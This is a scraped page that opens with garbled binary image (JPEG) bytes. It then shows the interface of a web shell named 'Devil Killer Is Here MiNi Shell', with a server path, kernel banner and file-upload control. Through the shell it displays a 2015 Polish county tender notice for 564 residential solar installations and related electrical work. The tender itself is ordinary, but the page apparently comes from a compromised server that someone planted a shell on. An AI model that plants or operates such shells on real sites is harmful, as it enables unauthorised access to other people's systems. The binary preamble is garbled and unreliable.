JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150911/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150911/134891-N-2015.html

<p class="kh_header"><b>Sucha Beskidzka: Wykonanie robót budowlanych polegających na wykonaniu 564 instalacji solarnych dla budynków mieszkalnych na terenie powiatu suskiego i zdalnego systemu monitoringu instalacji solarnych oraz wykonanie zabezpieczeń różnicowo-prądowych w istniejących instalacjach solarnych dla budynków mieszkalnych na terenie Powiatu Suskiego
w ramach projektu Program zwiększania wykorzystywania energii i poprawy jakości powietrza w obrębie obszaru Natura 2000, Powiatu Suskiego.</b><br>
<b>Numer ogłoszenia: 134891 - 2015; data zamieszczenia: 11.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe  w Suchej Beskidzkiej , ul. Mickiewicza 19, 34-200 Sucha Beskidzka, woj. małopolskie, tel. 33 875 79 00, faks 33 874 15 52.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatsuski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych polegających na wykonaniu 564 instalacji solarnych dla budynków mieszkalnych na terenie powiatu suskiego i zdalnego systemu monitoringu instalacji solarnych oraz wykonanie zabezpieczeń różnicowo-prądowych w istniejących instalacjach solarnych dla budynków mieszkalnych na terenie Powiatu Suskiego
w ramach projektu Program zwiększania wykorzystywania energii i poprawy jakości powietrza w obrębie obszaru Natura 2000, Powiatu Suskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie:
Część nr 1 - wykonanie robót budowlanych polegających na wykonaniu 564 instalacji solarnych dla budynków mieszkalnych na terenie Powiatu Suskiego oraz zdalnego systemu monitoringu instalacji solarnych;
Część nr 2 - wykonanie robót budowlanych polegających na wykonaniu zabezpieczeń różnicowo-prądowych w istniejących instalacjach solarnych zlokalizowanych w budynkach mieszkalnych na terenie Powiatu Suskiego.
Opis przedmiotu zamówienia dla części nr 1 zawarty jest w Załączniku Nr 1a do SIWZ oraz w dokumentach tam wskazanych, w tym:
1)	Przedmiary robót w obrębie budynków mieszkalnych stanowi ZAŁĄCZNIK NR Ia.
2)	Przedmiar robót dotyczący wykonania zdalnego systemu monitoringu instalacji solarnych stanowi ZAŁĄCZNIK NR Ib.
3)	Specyfikacja techniczna wykonania i odbioru robót budowlanych (STWIORB) dla instalacji solarnych w obrębie  budynków mieszkalnych stanowi Załącznik Nr IIa. 
4)	Specyfikacja techniczna wykonania i odbioru robót budowlanych (STWIORB) wykonania zdalnego systemu monitoringu instalacji solarnych Załącznik NR II b. 
5)	Projekty wykonawcze dla instalacji solarnych w obrębie 564 budynków mieszkalnych stanowią Załącznik Nr IIIa.
6)	Projekt budowlano wykonawczy wykonania zdalnego systemu monitoringu instalacji  solarnych  stanowi Załącznik Nr IIIb.
Opis przedmiotu zamówienia dla części nr 2 zawarty jest w załączniku nr 1b do SIWZ.
Zamówienie powinno być wykonywane zgodnie z Istotnymi postanowieniami umowy, które są określone: 
1)	dla części nr 1 - w Załączniku Nr 2a do SIWZ, 
2)	dla części nr 2 - w załączniku nr 2b do SIWZ,
Pozostałe szczegółowe informacje zawarto w specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, polegających na  polegających na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego, w szczególności na wykonaniu kolejnych instalacji solarnych dla domów mieszkalnych na terenie Powiatu Suskiego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.00.00.00-7, 45.33.10.00-6, 45.33.00.00-9, 45.32.10.00-3, 45.31.00.00-3, 09.33.11.00-9, 09.33.20.00-5, 38.55.10.00-2, 38.55.40.00-3, 38.42.11.00-3, 38.12.70.00-1, 32.44.13.00-9, 72.21.10.00-7, 72.25.41.00-1, 45.31.12.00-2, 45.31.11.00-1, 31.21.41.30-9, 31.21.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wnieść wadium w wysokości:
a)	dla części nr 1 - 150.000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych),
b)	dla części nr 2 - 2.000,00 zł (słownie: dwa tysiące złotych).
Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy zamawiającego:
nr  31 2030 0045 1110 0000 0155 1450 
Bank BGŻ BNP Paribas S.A.,                                                  
 z adnotacją wadium - numer sprawy WI. 272.26.2015.
Zaleca się dołączenie do oferty kserokopii dokumentu potwierdzającego dokonanie przelewu.
Za skuteczne wniesienie wadium w pieniądzu, zamawiający uzna wadium, które znajdzie się na rachunku bankowym zamawiającego przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.
wykonawcy muszą złożyć wraz z ofertą Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik Nr 3a do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), wykonał należycie co najmniej: 
Dla części nr 1 
- zadanie lub zadania (co najmniej jedno zadanie) polegające na dostawie i montażu łącznie nie mniej niż 300 instalacji solarnych o sumarycznej powierzchni absorpcji nie mniejszej niż 1400 m2, przy czym w przynajmniej jedno zadanie obejmujące takie prace o wartości nie mniejszej niż 3.000.000 złotych brutto.
- co najmniej jedno zadanie polegające na wykonaniu systemu monitoringu urządzeń technicznych, elektrycznych lub elektronicznych, obejmującego zdalne (bezprzewodowe) przesyłanie danych oraz ich zbieranie i przetwarzanie, o wartości nie mniejszej niż 100.000 złotych.
Dla części nr 2 - zadanie lub zadania (co najmniej jedno zadanie) polegające na wykonaniu robót związanych z budową lub przebudową instalacji elektrycznych o łącznej wartości nie mniejszej niż 50.000 złotych brutto.

Wykonawcy muszą złożyć wraz z ofertą dokumenty o których mowa powyżej oraz Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik Nr 3a do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.
wykonawcy muszą złożyć wraz z ofertą Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik Nr 3a do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli wykonawca dysponuje lub będzie dysponował:  
Dla części nr 1:
1)	jedną osobą na stanowisko koordynatora wykonawcy i kierownika robót w zakresie instalacji cieplnych, posiadającą następujące kwalifikacje:
a)	uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych wodociągowych i kanalizacyjnych; 
b)	co najmniej 5 letnie doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót, w tym doświadczenie w kierowaniu robotami przy co najmniej jednym zadaniu polegającym na dostawie i montażu instalacji solarnych o łącznej powierzchni absorpcji nie mniejszej niż 1400 m2, które obejmowało wykonanie nie mniej niż 300 instalacji solarnych; 
2) 	jedną osobą na stanowisko kierownika robót w zakresie instalacji cieplnych, która posiada uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych wodociągowych i kanalizacyjnych oraz co najmniej dwuletnie doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót w tym zakresie,
3) 	dwoma osobami na stanowisko kierowników robót w zakresie konstrukcji, które posiadają (każda) uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz co najmniej dwuletnie doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót w tym zakresie,
4) 	dwoma osobami na stanowisko kierowników robót w zakresie instalacji elektrycznych, które posiadają (każda) uprawnienia do kierowania robotami budowlanymi w zakresie  sieci i instalacji elektrycznych oraz co najmniej dwuletnie doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót w tym zakresie.
Wszystkie osoby, o których mowa powyżej powinny posiadać uprawnienia budowlane w odpowiednich specjalnościach do kierowania robotami budowlanymi - zgodnie z wymogami określonymi przepisami prawa kraju, w którym osoba uzyskała właściwe uprawnienia, oraz być członkami właściwej izby samorządu zawodowego lub innej organizacji, o ile przepisy prawa kraju, w którym osoba uzyskała właściwe uprawnienia, wymagają członkostwa w izbie samorządu zawodowego lub innej organizacji do wykonywania zawodu regulowanego. Osobami / kandydatami na stanowiska wymienione powyżej mogą być obywatele państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub Państw Członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - Europejskiego Obszaru Gospodarczego, którym - zgodnie przepisami dyrektywy 2005/36/WE Parlamentu Europejskiego i Rady z dnia 7.9.2005 r. w sprawie uznawania kwalifikacji zawodowych - uznano kwalifikacje zawodowe lub uznaje się kwalifikacje przez właściwe organy w Polsce. Osobami takimi mogą być również osoby spełniające warunki określone w art. 20a ustawy o samorządach zawodowych architektów, inżynierów i urbanistów. 
5) 	zespołem minimum 30 monterów, którzy będą uczestniczyć w wykonaniu zamówienia w obrębie poszczególnych budynków za pomocą brygad (do realizacji robót zamawiający zakłada konieczność działania minimum 6 brygad jednocześnie). W każdej z brygad znajdować się musi osoba, która będzie pełnić funkcję kierownika brygady (sześć osób): 
a) 	posiadającą autoryzację do montażu kolektorów słonecznych, wystawioną przez producenta kolektorów słonecznych ujętych w ofercie,
b)  	posiadająca doświadczenie w wykonaniu minimum 20 kompletnych instalacji solarnych.

Warunki, o których mowa w pkt 5 lit. a-b, dla jednej brygady może spełniać jedna osoba, pod warunkiem posiadania łącznie wszystkich kwalifikacji tam opisanych.
Minimalna ilość osób wchodzących w skład zespołu, o którym mowa w pkt 4.1.4.4. nie obejmuje osób wymienionych w pkt od 4.1.4.1 do 4.1.4.4 siwz . 
Dla części nr 2 - jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia w charakterze kierownika robót w zakresie instalacji elektrycznych, która posiada uprawnienia do kierowania robotami budowlanymi bez ograniczeń w zakresie sieci i instalacji elektrycznych oraz co najmniej dwuletnie doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót w tym zakresie.
Osoba, o której mowa powyżej powinna posiadać uprawnienia budowlane w odpowiednich specjalnościach do kierowania robotami budowlanymi - zgodnie z wymogami określonymi przepisami prawa kraju, w którym osoba uzyskała właściwe uprawnienia, oraz być członkami właściwej izby samorządu zawodowego lub innej organizacji, o ile przepisy prawa kraju, w którym osoba uzyskała właściwe uprawnienia, wymagają członkostwa w izbie samorządu zawodowego lub innej organizacji do wykonywania zawodu regulowanego. Osobami / kandydatami na stanowiska wymienione powyżej mogą być obywatele państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub Państw Członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - Europejskiego Obszaru Gospodarczego, którym - zgodnie przepisami dyrektywy 2005/36/WE Parlamentu Europejskiego i Rady z dnia 7.9.2005 r. w sprawie uznawania kwalifikacji zawodowych - uznano kwalifikacje zawodowe lub uznaje się kwalifikacje przez właściwe organy w Polsce. Osobami takimi mogą być również osoby spełniające warunki określone w art. 20a ustawy o samorządach zawodowych architektów, inżynierów i urbanistów.
Wykonawcy muszą złożyć wraz z ofertą dokumenty o których mowa powyżej oraz Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik Nr 3a do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części nr 1 - posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 5.000.000 złotych
Wykonawcy muszą złożyć wraz z ofertą dokumenty o których mowa powyżej oraz Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik Nr 3a do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

